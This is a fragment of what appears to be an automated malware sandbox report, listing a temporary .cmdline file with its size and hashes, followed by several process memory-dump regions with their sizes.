                                                      9c8efab5895c50069512e56b4efc81547f70092064cad8cf526a77f087dace036e876e4da5178d30be213b0c3d9214ef660920c6eff2c7474e5a6d47dfea40d0

                                                    • \??\c:\Users\Admin\AppData\Local\Temp\pyrphdsg\pyrphdsg.cmdline

                                                      Filesize

                                                      369B

                                                      MD5

                                                      f48d85017dfbfb1e7a45b2c857f980d5

                                                      SHA1

                                                      7b80857f506bcf688176268a731f69352175ca05

                                                      SHA256

                                                      0db84a69667b9ce51bb6ec7723fd25904fd6f8f3bc090b2c6431b175ca05d577

                                                      SHA512

                                                      c3d4ef666e41836927e4e3403919e0d3b82d456723bd48197f1d09ef97db78507c65210228b3accf5502a80fbea38ef944f1e2df4adaf0e5c39d8978cdd59a37

                                                    • memory/244-271-0x0000015EEDE50000-0x0000015EEDE68000-memory.dmp

                                                      Filesize

                                                      96KB

                                                    • memory/244-270-0x0000015EEDBE0000-0x0000015EEDBF2000-memory.dmp

                                                      Filesize

                                                      72KB

                                                    • memory/4560-113-0x00000168E47D0000-0x00000168E47F2000-memory.dmp

                                                      Filesize

                                                      136KB

                                                    • memory/5320-163-0x000001F6B1690000-0x000001F6B1698000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/5320-150-0x000001F6B16A0000-0x000001F6B16BC000-memory.dmp

                                                      Filesize

                                                      112KB

                                                    • memory/5824-241-0x000001F06A330000-0x000001F06A342000-memory.dmp

                                                      Filesize

                                                      72KB

                                                    • memory/5824-240-0x000001F06A1C0000-0x000001F06A1C8000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/5824-239-0x000001F06A7C0000-0x000001F06A836000-memory.dmp

                                                      Filesize

                                                      472KB

                                                    • memory/5824-238-0x000001F06A360000-0x000001F06A3A4000-memory.dmp

                                                      Filesize

                                                      272KB